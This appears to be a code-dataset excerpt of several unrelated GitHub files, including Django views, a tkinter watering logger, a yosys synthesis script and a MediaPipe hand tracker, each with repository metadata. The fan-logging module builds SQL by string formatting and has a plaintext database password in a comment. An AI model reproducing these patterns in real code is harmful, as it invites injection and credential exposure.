return [(int(x[0]), "%d:%d" % (int(x[1] / 604800), int(x[1] % 604800))) for x in orbitstart_list]
|
ZhenghengLi/POLAR_DATA
|
Preprocessing/script/split_time.py
|
split_time.py
|
py
| 2,130
|
python
|
en
|
code
| 2
|
github-code
|
6
|
2568321990
|
from DATA.datamanager import Datamanager
dm=Datamanager()
"""
woorden=dm.alle_woorden()
for woord in woorden :
print (woord[1] )
woord = "abluties"
woord=dm.check_by_zoekterm(woord,woord[0])
print (woord)
"""
woord = "daar"
woord=dm.check_by_zoekterm_alle_woorden(woord)
print (woord)
"""a="test"
print (len(a))
print ("e" in a )
print (("0" or "e") not in a)
print (a[0].upper())
#Aäron
#¤
raarletters = "`å` `ç` `ñ` `Å` `ä` `ë` `ï` `ö` `ü` en `â` `ê` `î` `ô` `û`"
print (raarletters.upper())"""
|
johangoyvaerts/PhytonicWordGame-johan
|
test.py
|
test.py
|
py
| 523
|
python
|
en
|
code
| 0
|
github-code
|
6
|
18446576990
|
from django.conf import settings
from django.contrib import messages
from django.http import HttpResponseRedirect
from allauth.account import signals
from allauth.account.adapter import DefaultAccountAdapter
class AccountAdapter(DefaultAccountAdapter):
def is_open_for_signup(self, request):
return getattr(settings, "ACCOUNT_SIGNUP_OPEN", True)
def post_login(self, request, user, *, email_verification, signal_kwargs, email, signup, redirect_url):
# Copied from https://github.com/pennersr/django-allauth/blob/master/allauth/account/adapter.py#L441 in order
# to remove the "logged in" message. See this issue for more information: https://github.com/pennersr/django-allauth/issues/3205
from allauth.account.utils import get_login_redirect_url
response = HttpResponseRedirect(get_login_redirect_url(request, redirect_url, signup=signup))
if signal_kwargs is None:
signal_kwargs = {}
signals.user_logged_in.send(
sender=user.__class__,
request=request,
response=response,
user=user,
**signal_kwargs,
)
if getattr(settings, "ACCOUNT_SHOW_POST_LOGIN_MESSAGE", True) is True:
self.add_message(
request,
messages.SUCCESS,
"account/messages/logged_in.txt",
{"user": user},
)
return response
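# Usage sketch (the settings module path is an assumption for this project layout):
# ACCOUNT_ADAPTER = "apps.accounts.auth_adapter.AccountAdapter"
# ACCOUNT_SIGNUP_OPEN = False  # closes self-signup, read by is_open_for_signup above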
|
epicserve/django-base-site
|
apps/accounts/auth_adapter.py
|
auth_adapter.py
|
py
| 1,443
|
python
|
en
|
code
| 284
|
github-code
|
6
|
16647141836
|
import os
import pandas as pd
import numpy as np
from tqdm.auto import tqdm
from textaugment import EDA
from nltk.tokenize import word_tokenize
class DataProcessing:
def __init__(self, input_path, output_path):
self.input_path = input_path
self.output_path = output_path
self.X = None
self.label = None
self.text = None
def read_file(self):
data = pd.read_csv(self.input_path, names=['text', 'label'])
self.text = data.text
if not data.label.isnull().all():
self.label = data.label
def convert_to_vector(self, emb_dict):
X = []
emb_len = len([*emb_dict.values()][0])
for sentence in self.text.values:
vector = np.zeros((1, emb_len))
words = [word for word in sentence.split() if word in emb_dict.keys()]
if len(words):
vector = np.mean([emb_dict[w] for w in words], axis=0)
X.append(vector)
self.X = np.vstack(X)
def augment_text(self, def_val=3):
eda = EDA()
avg = int(len(self.label) / self.label.nunique())
small_classes = (self.label.value_counts().reset_index(name='cnt')
.query(f'cnt < {avg}')['index'].values)
for cl in tqdm(small_classes):
tmp_df = self.text[self.label == cl]
for sentence in tmp_df.values:
text_aug = pd.Series([eda.synonym_replacement(sentence)
for _ in range(def_val)])
if sum(self.label==cl) > avg:
break
self.text = self.text.append(text_aug, ignore_index=True)
self.label = self.label.append(pd.Series([cl] * def_val),
ignore_index=True)
def shuffle_data(self):
new_index = np.random.randint(len(self.label), size=len(self.label))
self.label = self.label[new_index]
self.text = self.text[new_index]
def save_data(self):
np.save(os.path.join(self.output_path, 'X.npy'), self.X)
if self.label is not None:
np.save(os.path.join(self.output_path, 'Y.npy'),
self.label.to_numpy())
@staticmethod
def load_embedding(file_path):
embedding_dict = {}
with open(file_path, 'r') as f:
for line in tqdm(f):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], 'float32')
embedding_dict[word] = vectors
f.close()
return embedding_dict
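# Minimal usage sketch (file paths and the embedding file name are assumptions):
# dp = DataProcessing('data/raw/input.csv', 'data/processed')
# dp.read_file()
# emb = DataProcessing.load_embedding('glove.6B.50d.txt')
# dp.convert_to_vector(emb)
# dp.save_data()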
|
marynadorosh/test_task
|
src/data/make_dataset.py
|
make_dataset.py
|
py
| 2,626
|
python
|
en
|
code
| 0
|
github-code
|
6
|
31437732860
|
#!/bin/usr/python3
# Coding: utf-8
# Author: Rogen
# Description: planting watering records
from tkinter import ttk, messagebox
from GUI_language import *
import subprocess
import csv, os
import pandas as pd
import tkinter as tk
class Water_management(object):
def __init__(self,ver,code):
self.language = ver
self.internal_code = code
self.NodeAnswer = 'NodeAnswer.exe'
self.SaveCSV = './Dataset/Planting_Water.csv'
if self.language == 1:
ch = Chinese()
self.interface = ch.Plating_Management()
else:
en = English()
self.interface = en.Plating_Management()
# Save the watering record
def submit(self):
situation = self.check()
tag = 0
if situation == 1:
mylist = []
# Add tea site in the name
tag = 1 if os.path.exists(self.SaveCSV) else 0
with open(self.SaveCSV, 'a', encoding='utf_8_sig') as f:
if tag == 0:
f.write('Internal_Code,Sprinkler_Density_W,Sprinkler_Density_H,Frequence,Amount,Electric_Bill_Year,Water_Bill_Year,Water_Bill_Degreed\n')
mylist.append(self.internal_code)
for z in range(7):
mylist.append(self.water_info[z].get())
f.write(','.join(mylist)+'\n')
mylist.clear()
self.hidden_node_answer()
self.pw_delete_window()
# Check whether the form has been filled in
def check(self):
self.validation_box.delete(1.0,tk.END)
empty = []; situation = 1
for i in range(len(self.water_info)):
if self.water_info[i].get() == '':
if i == 0 or i == 1:
empty.append(self.interface['water']['sprinkler_density'])
elif i == 2:
empty.append(self.interface['water']['frequence'])
'''
# The following fields are optional; the user is not required to fill them in
elif i == 3:
empty.append(self.interface['water']['amount'])
elif i == 4:
empty.append(self.interface['water']['electric_bill_year'])
elif i == 5:
empty.append(self.interface['water']['bill_year'])
elif i == 6:
empty.append(self.interface['water']['bill_degree'])
'''
if len(empty):
situation = 0
for e in empty:
if self.language == 1:
self.validation_box.insert(1.0,'%s ๆชๅกซๅฏซ...\n' % e)
elif self.language == 2:
self.validation_box.insert(1.0,'%s is empty...\n' % e.replace('\n',''))
return(situation)
# Close the window and return to the main menu
def pw_delete_window(self):
from Option_List import optionlist
self.water.destroy()
manu = optionlist(self.language)
manu.main()
# Call the "NodeAnswer.exe" program (uses the watering record to answer expert-system questions)
def hidden_node_answer(self):
p = subprocess.run(self.NodeAnswer, shell=True)
# Edit a previous watering record
def watering_edit(self):
x = 1 # Escape the colunm of Internal_Code
if os.path.exists(self.SaveCSV):
pw_df = pd.read_csv(self.SaveCSV,encoding='utf_8_sig',delimiter=',')
try:
index = pw_df.index[pw_df['Internal_Code'] == self.internal_code].tolist()[-1]
for ob in self.water_info:
if str(pw_df.iloc[index,x]) == 'nan':
pw_df.iloc[index,x] = ''
ob.set(pw_df.iloc[index,x])
x = x+1
except IndexError as e:
tk.messagebox.showerror('ERROR','You do not recode any infomation!')
else:
tk.messagebox.showerror('ERROR','You do not recode any infomation!')
# Main program interface
def main(self):
self.water = tk.Tk()
self.water.geometry('620x415')
self.water.resizable(width=False,height=False)
self.water.title(self.interface['water']['title'])
self.water.protocol("WM_DELETE_WINDOW",self.pw_delete_window)
sprinkler_density_width = tk.StringVar()
sprinkler_density_heigh = tk.StringVar()
watering_frequence = tk.StringVar()
watering_volume = tk.StringVar()
electric_bill_year = tk.StringVar()
water_bill_year = tk.StringVar()
water_bill = tk.StringVar()
self.water_info = [sprinkler_density_width,sprinkler_density_heigh,watering_frequence,watering_volume,electric_bill_year,water_bill_year,water_bill]
self.watering_list = ['3-5ๅคฉไธๆฌก','ๆฏๅจไธๆฌก','ๆฏๆฌไธๆฌก','ๆฏๅฉ้ฑไธๆฌก','ๆฏๆไธๆฌก','่กจๅไนพๅณ็ๆบ']
water_frame = tk.Frame(self.water,highlightbackground='blue',highlightcolor='black',highlightthickness=1,bd=5)
water_frame.place(x=10,y=20,width=600,height=100)
tk.Label(water_frame,text=self.interface['water']['sprinkler_density']).grid(row=0,column=0)
tk.Label(water_frame,text=self.interface['water']['frequence']).grid(row=0,column=1)
tk.Label(water_frame,text=self.interface['water']['amount']).grid(row=0,column=2)
tk.Label(water_frame,text=self.interface['water']['electric_bill_year']).grid(row=0,column=3)
tk.Label(water_frame,text=self.interface['water']['bill_year']).grid(row=0,column=4)
tk.Label(water_frame,text=self.interface['water']['bill_degree']).grid(row=0,column=5)
sprinkler_frame = tk.Frame(water_frame)
sprinkler_frame.grid(row=1,column=0,padx=3,pady=5)
for k in range(7):
if k == 0:
tk.Entry(sprinkler_frame,textvariable=self.water_info[k],width=4).grid(row=0,column=k,padx=2,pady=5)
tk.Label(sprinkler_frame,text='mx').grid(row=0,column=k+1,padx=2,pady=5)
elif k == 1:
tk.Entry(sprinkler_frame,textvariable=self.water_info[k],width=4).grid(row=0,column=k+2,padx=2,pady=5)
tk.Label(sprinkler_frame,text='m').grid(row=0,column=k+3,padx=2,pady=5)
elif k == 2:
watering_combox = ttk.Combobox(water_frame,textvariable=self.water_info[k],values=self.watering_list,width=11,state='readonly')
watering_combox.grid(row=1,column=k-1,padx=2,pady=5)
else:
tk.Entry(water_frame,textvariable=self.water_info[k],width=11).grid(row=1,column=k-1,padx=2,pady=5)
tk.Button(self.water,text=self.interface['button']['button']['submit'],width=7,command=self.submit).place(x=530,y=140)
tk.Button(self.water,text='Edit',width=7,command=self.watering_edit).place(x=450,y=140)
self.validation_box = tk.Text(self.water, bg='lightgray', width=85, height=10)
self.validation_box.place(x=10,y=190)
self.water.mainloop()
# if __name__ == '__main__':
# w = Water_management(1,'000-0001')
# w.main()
|
NCHU-rogen/ExpertSystem_Project
|
Planting_water.py
|
Planting_water.py
|
py
| 5,947
|
python
|
en
|
code
| 0
|
github-code
|
6
|
16270189491
|
import pymysql
import datetime
def insert(outsideTemp, insideTemp, targetTemp, fanState):
sql = "INSERT INTO FANS ( `time`, `outside_temp`, `inside_temp`, `target_temp`, `fan_state`) "
sql += "VALUES ( \"{0}\", {1}, {2}, {3}, {4})".format(datetime.datetime.now(), outsideTemp, insideTemp, targetTemp, fanState)
try:
connection = pymysql.connect(host='localhost', db='fans')
#connection = pymysql.connect(host='localhost', user='root', db='fans', password='c0staRic4')
#connection = pymysql.connect(host='localhost', user='pi', db='fans')
cursor = connection.cursor()
#print(sql)
cursor.execute(sql)
connection.commit()
finally:
connection.close()
def select_today():
sql = "SELECT * FROM FANS WHERE DATE(time)=CURRENT_DATE()"
return select_sql(sql)
def select_last():
sql="select * from FANS order by time desc limit 1"
return select_sql(sql)
def select_sql(sql):
try:
connection = pymysql.connect(host='localhost', db='fans')
cursor = connection.cursor()
cursor.execute(sql)
result = cursor.fetchall()
finally:
connection.close()
return result
'''
CREATE USER 'pi'@'localhost';
GRANT ALL on *.* to 'pi'@'localhost' WITH GRANT OPTION;
create database fans;
use fans;
CREATE TABLE `FANS` (
`time` TIMESTAMP NOT NULL,
`outside_temp` FLOAT NOT NULL,
`inside_temp` FLOAT NOT NULL,
`target_temp` FLOAT NOT NULL,
`fan_state` BOOLEAN NOT NULL,
PRIMARY KEY (`time`)
);
INSERT INTO fans ( `time`, `outside_temp`, `inside_temp`, `fan_state`)
VALUES ( datetime.datetime.now(), 56.7, 74.0, TRUE )
'''
|
scottware/fans
|
database.py
|
database.py
|
py
| 1,653
|
python
|
en
|
code
| 0
|
github-code
|
6
|
27513964476
|
# -*- coding: utf-8 -*-
import os
import sys
import io
import math
def synthesize_asic_entity(yosys_location, yosys_synth_script, target_cell, entity_name, timing_constraint, synthesis_output_folder):
# Check if folder exists, and if not create
if(not os.path.isdir(synthesis_output_folder)):
os.mkdir(synthesis_output_folder)
# Check if folder exists for the synthesis script, if not, create it
int_synthesis_output_folder = synthesis_output_folder + '/' + yosys_synth_script[:-4]
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
# Check if folder exists for the target cell, if not, create it
int_synthesis_output_folder = int_synthesis_output_folder + '/' + target_cell['name']
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
command = 'SYNTH_TOP_UNIT_NAME=' + entity_name + ' '
command = command + 'SYNTH_ASIC_CELL_LOCATION=' + target_cell['liberty_file'] + ' '
command = command + 'SYNTH_ASIC_PIN_CONSTRAINTS=' + target_cell['pin_constr_file'] + ' '
command = command + 'SYNTH_TIMING_CONSTRAINT=' + timing_constraint + ' '
command = command + 'SYNTH_OUTPUT_CIRCUIT_FOLDER=' + int_synthesis_output_folder + ' '
log_filename = int_synthesis_output_folder + '/' + entity_name + '__t_' + timing_constraint + '.yslog'
command = command + yosys_location + ' -l ' + log_filename + ' -c ' + yosys_synth_script + ' -q'
print(command)
os.system(command)
# Open log and look for the delay and area results
result_filename = int_synthesis_output_folder + '/' + entity_name + '__t_' + timing_constraint + '.result'
# Area string to look for
area_result_line_1 = 'Chip area for module ' + "'" + "\\" + entity_name + "':"
area_result_line_2 = 'Chip area for top module ' + "'" + "\\" + entity_name + "':"
possible_area_result_lines = []
# Delay string to look for
delay_result_line = 'Delay ='
possible_delay_result_lines = []
with open(log_filename, "r") as log_file:
for log_line in log_file:
if (delay_result_line in log_line):
possible_delay_result_lines += [log_line]
if (area_result_line_1 in log_line):
possible_area_result_lines += [log_line]
if (area_result_line_2 in log_line):
possible_area_result_lines += [log_line]
# Only write the biggest area found for the top architecture
if(len(possible_area_result_lines) <= 1):
biggest_area_line = 0
else:
biggest_area_line = 0
temp_line_splitted = possible_area_result_lines[0].split(":")
biggest_area_line_result = float((temp_line_splitted[1]).strip())
for i in range(1, len(possible_area_result_lines)):
temp_line_splitted = possible_area_result_lines[i].split(":")
temp_area_line_result = float((temp_line_splitted[1]).strip())
if(temp_area_line_result > biggest_area_line_result):
biggest_area_line = i
biggest_area_line_result = temp_area_line_result
# Only write the first delay found. This needs to be redone, because ABC doesn't give proper delay results for non flattened results.
with open(result_filename, "w") as result_file:
result_file.write(possible_area_result_lines[biggest_area_line])
result_file.write(possible_delay_result_lines[0])
def synthesize_simple_entity(yosys_location, yosys_synth_script, entity_name, synthesis_output_folder):
# Check if folder exists, and if not create
if(not os.path.isdir(synthesis_output_folder)):
os.mkdir(synthesis_output_folder)
# Check if folder exists for the synthesis script, if not, create it
int_synthesis_output_folder = synthesis_output_folder + '/' + yosys_synth_script[:-4]
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
command = 'SYNTH_TOP_UNIT_NAME=' + entity_name + ' '
command = command + 'SYNTH_OUTPUT_CIRCUIT_FOLDER=' + int_synthesis_output_folder + ' '
log_filename = int_synthesis_output_folder + '/' + entity_name + '.yslog'
command = command + yosys_location + ' -l ' + log_filename + ' -c ' + yosys_synth_script + ' -q'
print(command)
os.system(command)
def synthesize_asic_list(yosys_location, all_yosys_synth_scripts, all_target_cells, all_entity_names, all_timing_constraints, synthesis_output_folder):
for each_yosys_synth_ecript in all_yosys_synth_scripts:
for each_std_cell in all_target_cells:
for each_entity in all_entity_names:
for each_timing_constraint in all_timing_constraints:
synthesize_asic_entity(yosys_location, each_yosys_synth_ecript, each_std_cell, each_entity, each_timing_constraint, synthesis_output_folder)
def synthesize_simple_list(yosys_location, all_yosys_synth_scripts, all_entity_names, synthesis_output_folder):
for each_yosys_synth_ecript in all_yosys_synth_scripts:
for each_entity in all_entity_names:
synthesize_simple_entity(yosys_location, each_yosys_synth_ecript, each_entity, synthesis_output_folder)
def generate_csv_with_all_results(all_yosys_asic_synth_script, all_target_cells, all_entity_names, all_timing_constraints, synthesis_output_folder):
area_result_line = 'Chip area'
delay_result_line = 'Delay ='
csv_file_name = synthesis_output_folder + '/' + 'results.csv'
for each_yosys_synth_ecript in all_yosys_asic_synth_script:
with io.open(csv_file_name, "w", encoding="ascii", newline='') as csv_file:
line = '"Entity Name","Technology","Timing Constraint","Area","GE","Delay"\r\n'
csv_file.write(unicode(line, encoding="ascii"))
for each_std_cell in all_target_cells:
nand_size = 0.0
with open(each_std_cell['nand_file'], "r") as nand_file:
nand_size = float(nand_file.readline())
for each_entity in all_entity_names:
for each_timing_constraint in all_timing_constraints:
line = '"' + each_entity + '"' + ',' + '"' + each_std_cell['name'] + '"' + ',' + '"' + each_timing_constraint + '"' + ','
result_filename = synthesis_output_folder + '/' + each_yosys_synth_ecript[:-4] + '/' + each_std_cell['name'] + '/' + each_entity + '__t_' + each_timing_constraint + '.result'
with open(result_filename, "r") as result_file:
for result_line in result_file:
if(area_result_line in result_line):
area_line_splitted = result_line.split(":")
area_result = (area_line_splitted[1]).strip()
line = line + '"' + area_result + '"' + ','
area_result_ge = str(int(math.ceil(float(area_result)/nand_size)))
line = line + '"' + area_result_ge + '"' + ','
with open(result_filename, "r") as result_file:
for result_line in result_file:
if(delay_result_line in result_line):
delay_line_splitted = result_line.split(delay_result_line)
delay_result = ((delay_line_splitted[1]).split())[0]
line = line + '"' + delay_result + '"'
line = line + '\r\n'
csv_file.write(unicode(line, encoding="ascii"))
# STD cells descriptions
asic_cells_base_folder = '/home/pedro/asic_cells/'
gscl45nm_library = {
'name' : 'gscl45nm',
'liberty_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.lib',
'pin_constr_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.constr',
'nand_file' : asic_cells_base_folder + 'gscl45nm/gscl45nm.nand',
}
nangate1_library = {
'name' : 'NangateOpenCellLibrary_typical_ccs',
'liberty_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.lib',
'pin_constr_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.constr',
'nand_file' : asic_cells_base_folder + 'NangateOpenCellLibrary_typical_ccs/NangateOpenCellLibrary_typical_ccs.nand',
}
# Adding cells to the list
all_std_cells_libraries = []
all_std_cells_libraries += [gscl45nm_library]
all_std_cells_libraries += [nangate1_library]
yosys_location = 'yosys'
all_yosys_asic_synth_script = ['synth_asic.tcl']
all_yosys_simple_synth_script = ['synth_simple.tcl']
# All timing constraints
all_timing_constraints = []
all_timing_constraints += ['10000']
# All entity names
all_entity_names = []
all_entity_names += ['subterranean_round']
all_entity_names += ['subterranean_rounds_simple_1']
all_entity_names += ['subterranean_rounds_simple_2']
all_entity_names += ['subterranean_rounds_simple_4']
# Synthesis output folder
synthesis_output_folder = 'synth_out'
if __name__ == "__main__" :
if(len(sys.argv) == 1):
print('This is a basic synthesizes script')
print('')
print('You can try to synthesize an entity not named here by just writing the name directly')
print('synth.py entity_name')
print('')
print('You can also synthesize one of the entities already listed here by writing -l and their number')
print('synth.py -l 0 1 2')
print('')
print('If you want everyone to be synthesized you can also just run -all')
print('synth.py -all')
print('')
print('If you want to generate asic csv report use -g')
print('synth.py -g')
print('')
print('Here are all timings in the script')
for i in range(len(all_timing_constraints)):
print(all_timing_constraints[i])
print('')
print('Here are all entities already in the script')
for i in range(len(all_entity_names)):
print(str(i) + ' - ' + all_entity_names[i])
else:
if(sys.argv[1] == '-all'):
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, all_entity_names, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, all_entity_names, synthesis_output_folder)
elif(sys.argv[1] == '-l'):
selected_entity_names = []
list_of_numbers = [str(i) for i in sys.argv[2:]]
list_of_numbers = " ".join(list_of_numbers)
for i in range(len(all_entity_names)):
if(str(i) in list_of_numbers):
selected_entity_names += [all_entity_names[i]]
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, selected_entity_names, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, selected_entity_names, synthesis_output_folder)
elif(sys.argv[1] == '-g'):
generate_csv_with_all_results(all_yosys_asic_synth_script, all_std_cells_libraries, all_entity_names, all_timing_constraints, synthesis_output_folder)
else:
new_entity_name = [sys.argv[2]]
synthesize_asic_list(yosys_location, all_yosys_asic_synth_script, all_std_cells_libraries, new_entity_name, all_timing_constraints, synthesis_output_folder)
synthesize_simple_list(yosys_location, all_yosys_simple_synth_script, new_entity_name, synthesis_output_folder)
|
tintin10q/subterranean2digital
|
Reference_code/verilog_project/yosys_synth/synth.py
|
synth.py
|
py
| 11,689
|
python
|
en
|
code
| 0
|
github-code
|
6
|
26625188476
|
from django.conf import settings
from django.core import urlresolvers
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.utils.translation import ugettext_lazy as _
from product.modules.downloadable.models import DownloadLink
from satchmo_store.shop.signals import sendfile_url_for_file
import mimetypes
import os
import os.path
import re
from urlparse import urljoin
SHA1_RE = re.compile('^[a-f0-9]{40}$')
def _validate_key(download_key):
"""
Helper function to make sure the key is valid and all the other constraints on
the download are still valid.
Returns a tuple (False,"Error Message", None) or (True, None, dl_product)
"""
download_key = download_key.lower()
if not SHA1_RE.search(download_key):
error_message = _("The download key is invalid.")
return (False, error_message, None)
    try:
        dl_product = DownloadLink.objects.get(key=download_key)
    except DownloadLink.DoesNotExist:
        error_message = _("The download key is invalid.")
        return (False, error_message, None)
valid, msg = dl_product.is_valid()
if not valid:
return (False, msg, None)
else:
return (True, None, dl_product)
def process(request, download_key):
"""
Validate that the key is good, then set a session variable.
Redirect to the download view.
We use this two step process so that we can easily display meaningful feedback
to the user.
"""
valid, msg, dl_product = _validate_key(download_key)
if not valid:
context = RequestContext(request, {'error_message': msg})
return render_to_response('shop/download.html',
context_instance=context)
else:
# The key is valid so let's set the session variable and redirect to the
# download view
request.session['download_key'] = download_key
url = urlresolvers.reverse('satchmo_download_send', kwargs= {'download_key': download_key})
context = RequestContext(request, {'download_product': dl_product,
'dl_url' : url})
return render_to_response('shop/download.html', context_instance=context)
def send_file(request, download_key):
"""
After the appropriate session variable has been set, we commence the download.
The key is maintained in the url but the session variable is used to control the
download in order to maintain security.
"""
if not request.session.get('download_key', False):
url = urlresolvers.reverse('satchmo_download_process', kwargs = {'download_key': download_key})
return HttpResponseRedirect(url)
valid, msg, dl_product = _validate_key(request.session['download_key'])
if not valid:
url = urlresolvers.reverse('satchmo_download_process', kwargs = {'download_key': request.session['download_key']})
return HttpResponseRedirect(url)
# some temp vars
file = dl_product.downloadable_product.file
file_url = '/%s' % file.name # create an absolute/root url
# poll listeners
url_dict = {'url': file_url}
sendfile_url_for_file.send(
None, file=file,
product=dl_product.downloadable_product,
url_dict=url_dict,
)
# url may have changed; update it
file_url = url_dict['url']
# get file name from url
file_name = os.path.basename(file_url)
dl_product.num_attempts += 1
dl_product.save()
del request.session['download_key']
response = HttpResponse()
# For Nginx
response['X-Accel-Redirect'] = file_url
# For Apache and Lighttpd v1.5
response['X-Sendfile'] = file_url
# For Lighttpd v1.4
response['X-LIGHTTPD-send-file'] = file_url
response['Content-Disposition'] = "attachment; filename=%s" % file_name
response['Content-length'] = file.size
contenttype, encoding = mimetypes.guess_type(file_name)
if contenttype:
response['Content-type'] = contenttype
return response
|
dokterbob/satchmo
|
satchmo/apps/product/modules/downloadable/views.py
|
views.py
|
py
| 4,066
|
python
|
en
|
code
| 30
|
github-code
|
6
|
40633067575
|
from django.urls import path
from .views import (
add_to_cart,
delete_from_cart,
order_details,
checkout,
update_transaction_records,
success
)
app_name = 'cart'
urlpatterns = [
    path('add-to-cart/<int:pk>/<slug:slug>/', add_to_cart, name="add_to_cart"),
    path('order-summary/', order_details, name="order_summary"),
    path('success/', success, name='purchase_success'),
    path('item/delete/<int:pk>/<slug:slug>/', delete_from_cart, name='delete_item'),
    path('checkout/', checkout, name='checkout'),
# path('^update-transaction/(?P<token>[-\w]+)/', update_transaction_records,
# name='update_records')
]
|
sadakchap/cfe-ecom
|
cart/urls.py
|
urls.py
|
py
| 662
|
python
|
en
|
code
| 0
|
github-code
|
6
|
20164701509
|
import cv2
import mediapipe as mp
from handLandmarksDefine import *
from objectCoords import *
import time
import numpy as np
import math
import serial
start_time = 0
end_time = 0
try:
arduino = serial.Serial('COM3', 9600)
except serial.serialutil.SerialException:
print("Arduino not connected")
# lm = landmark
class HandLandmarkDetector:
def __init__(self, static_image_mode, max_num_hands, model_complexity, min_detection_confidence,
min_tracking_confidence):
self.static_image_mode = static_image_mode
self.max_num_hands = max_num_hands
self.model_complexity = model_complexity
self.min_detection_confidence = min_detection_confidence
self.min_tracking_confidence = min_tracking_confidence
self.mpHands = mp.solutions.hands
self.hands = self.mpHands.Hands(self.static_image_mode, self.max_num_hands, self.model_complexity,
self.min_detection_confidence, self.min_tracking_confidence)
self.mpDraw = mp.solutions.drawing_utils
self.results = None
def draw_hand_landmarks(self, img):
img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.hands.process(img_rgb)
if self.results.multi_hand_landmarks:
for self.handLMS in self.results.multi_hand_landmarks:
self.mpDraw.draw_landmarks(img, self.handLMS, self.mpHands.HAND_CONNECTIONS)
return img
def find_hand_landmark_coordinates(self, img):
landmark_list = []
if self.results.multi_hand_landmarks:
for id, lm in enumerate(self.handLMS.landmark):
                # print(id, lm)  # noisy per-frame debug output
h, w, c = img.shape
cx, cy = int(lm.x * w), int(lm.y * h)
landmark_list.append([id, cx, cy])
cv2.circle(img, (cx, cy), 7, (255, 255, 255), cv2.FILLED)
return landmark_list
class HandTracker:
def __init__(self, width, height, top_left_x, top_left_y, color, thickness):
self.width = width
self.height = height
self.top_left_x = top_left_x
self.top_left_y = top_left_y
self.color = color
self.thickness = thickness
self.object_assembled = False
def reset_sizes(self, width, height, top_left_x, top_left_y, color, thickness):
self.width = width
self.height = height
self.top_left_x = top_left_x
self.top_left_y = top_left_y
self.color = color
self.thickness = thickness
def draw(self, img):
cv2.rectangle(img, (self.top_left_x, self.top_left_y), (self.top_left_x + self.width, self.top_left_y +
self.height), self.color, self.thickness)
def set_green_color(self):
self.color = (0, 255, 0)
self.object_assembled = True
def set_red_color(self):
self.color = (0, 0, 255)
self.object_assembled = False
def set_object_assembled_false(self):
self.object_assembled = False
def set_object_assembled_true(self):
self.object_assembled = True
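    # Turns the target rectangle green and reports success (returns 1) only after both
    # the index finger tip and the thumb tip have stayed inside the area for a 3-second dwell.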
def detect_hand_inside_area(self, landmark_list):
global start_time
global end_time
if len(landmark_list) != 0 and self.object_assembled is False:
if self.top_left_x <= landmark_list[INDEX_FINGER_TIP][1] <= self.top_left_x + self.width and self.top_left_y <= landmark_list[INDEX_FINGER_TIP][2] <= self.top_left_y + self.height\
and self.top_left_x <= landmark_list[THUMB_TIP][1] <= self.top_left_x + self.width and self.top_left_y <= landmark_list[THUMB_TIP][2] <= self.top_left_y + self.height:
self.color = (0, 255, 0)
if start_time == 0 and end_time == 0:
start_time = time.time()
end_time = start_time + 3
# print("end time: ")
# print(end_time)
# print("current time: ")
# print(time.time())
else:
if time.time() > end_time:
start_time = 0
end_time = 0
return 1
else:
self.color = (0, 0, 255)
def gesture_control(self, landmark_list, resized_frame, arduino):
global start_time
global end_time
if len(landmark_list) != 0:
x1, y1 = landmark_list[THUMB_TIP][1], landmark_list[THUMB_TIP][2]
x2, y2 = landmark_list[INDEX_FINGER_TIP][1], landmark_list[INDEX_FINGER_TIP][2]
cx, cy = (x1 + x2) // 2, (y1 + y2) // 2
cv2.circle(resized_frame, (x1, y1), 15, (255, 0, 255), cv2.FILLED)
cv2.circle(resized_frame, (x2, y2), 15, (255, 0, 255), cv2.FILLED)
cv2.line(resized_frame, (x1, y1), (x2, y2), (255, 0, 255), 3)
cv2.circle(resized_frame, (cx, cy), 15, (255, 0, 255), cv2.FILLED)
length = math.hypot(x2 - x1, y2 - y1)
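            # map the thumb-to-index pinch distance (roughly 70-250 px) onto a 0-250 value that is later written to the Arduino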
vol = np.interp(length, [70, 250], [0, 250])
if start_time == 0 and end_time == 0:
start_time = time.time()
end_time = start_time + 1
# print("end time: ")
# print(end_time)
# print("current time: ")
# print(time.time())
else:
if time.time() > end_time:
start_time = 0
end_time = 0
arduino.write(str(vol).encode())
class ObjectAssembler:
def draw_work_area(self, resized_frame, work_area_top_left, work_area_bottom_right, work_area_color,
work_area_thickness, text_content, text_font, text_font_scale, text_color, text_thickness):
cv2.rectangle(resized_frame, work_area_top_left, work_area_bottom_right, work_area_color, work_area_thickness)
text_x = work_area_top_left[0] + 5
text_y = work_area_top_left[1] + 30
cv2.putText(resized_frame, text_content, (text_x, text_y), text_font, text_font_scale, text_color,
text_thickness)
def draw_component_area(self, resized_frame,component_area_top_left, component_area_bottom_right,
component_area_color, component_area_thickness, text_content, text_font, text_font_scale,
text_color, text_thickness):
cv2.rectangle(resized_frame, component_area_top_left, component_area_bottom_right, component_area_color,
component_area_thickness)
text_x = component_area_top_left[0] + 5
text_y = component_area_top_left[1] + 30
cv2.putText(resized_frame, text_content, (text_x, text_y), text_font, text_font_scale, text_color,
text_thickness)
def draw_breadboard_outline(self, resized_frame, breadboard_top_left, breadboard_bottom_right,
breadboard_outline_color, breadboard_outline_thickness):
cv2.rectangle(resized_frame, breadboard_top_left, breadboard_bottom_right, breadboard_outline_color,
breadboard_outline_thickness)
def draw_next_component(self, resized_frame, next_top_left, next_bottom_right, next_color, next_thickness,
text_content, text_font, text_font_scale, text_color, text_thickness):
cv2.rectangle(resized_frame, next_top_left, next_bottom_right, next_color, next_thickness)
text_x = next_top_left[0] + 40
text_y = next_top_left[1] + 500
cv2.putText(resized_frame, text_content, (text_x, text_y), text_font, text_font_scale, text_color,
text_thickness)
def draw_previous_component(self, resized_frame, previous_top_left, previous_bottom_right, previous_color,
